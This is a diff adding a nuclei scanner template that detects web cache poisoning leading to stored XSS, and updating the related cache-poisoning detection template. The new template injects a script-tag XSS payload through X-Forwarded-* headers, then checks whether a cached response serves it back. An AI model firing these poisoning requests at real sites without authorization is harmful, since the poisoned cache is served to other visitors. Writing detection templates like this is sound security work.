Merge pull request #7072 from projectdiscovery/cache-fixes

Added Cache Poisoning based Stored XSS Detection

vulnerabilities/generic/cache-poisoning-xss.yaml

@@ -0,0 +1,36 @@
+id: cache-poisoning-xss
+
+info:
+  name: Cache Poisoning - Stored XSS
+  author: melbadry9,xelkomy,akincibor
+  severity: high
+  reference:
+    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
+    - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
+  tags: cache,generic,xss
+
+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+  xss_payload: '"></script><script>alert(document.domain);</script>'
+
+requests:
+  - raw:
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
+        X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
+        X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
+
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_2, cache_header)
+          - contains(body_2, xss_payload)
+        condition: and

vulnerabilities/generic/cache-poisoning.yaml

@@ -1,33 +1,33 @@
 id: cache-poisoning
 
 info:
-  name: Cache Poisoning
+  name: Cache Poisoning Detection
   author: melbadry9,xelkomy,akincibor,dogasantos
   severity: low
   reference:
     - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
     - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
   tags: cache,generic
 
+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+
 requests:
   - raw:
       - |
-        GET /?{{randstr}}=9 HTTP/1.1
+        GET /?{{cache_key}}=9 HTTP/1.1
-        X-Forwarded-Prefix: prefix.cache.interact.sh
+        Host: {{Hostname}}
-        X-Forwarded-Host: host.cache.interact.sh
+        X-Forwarded-Prefix: {{cache_header}}.xfp
-        X-Forwarded-For: for.cache.interact.sh
+        X-Forwarded-Host: {{cache_header}}.xfh
+        X-Forwarded-For: {{cache_header}}.xff
 
       - |
-        GET /?{{randstr}}=9 HTTP/1.1
+        GET /?{{cache_key}}=9 HTTP/1.1
+        Host: {{Hostname}}
 
-    req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, "cache.interact.sh")'
+          - 'contains(body_2, cache_header)'
-
-    extractors:
-      - type: regex
-        part: response
-        regex:
-          - "(prefix|host|for).cache.interact.sh"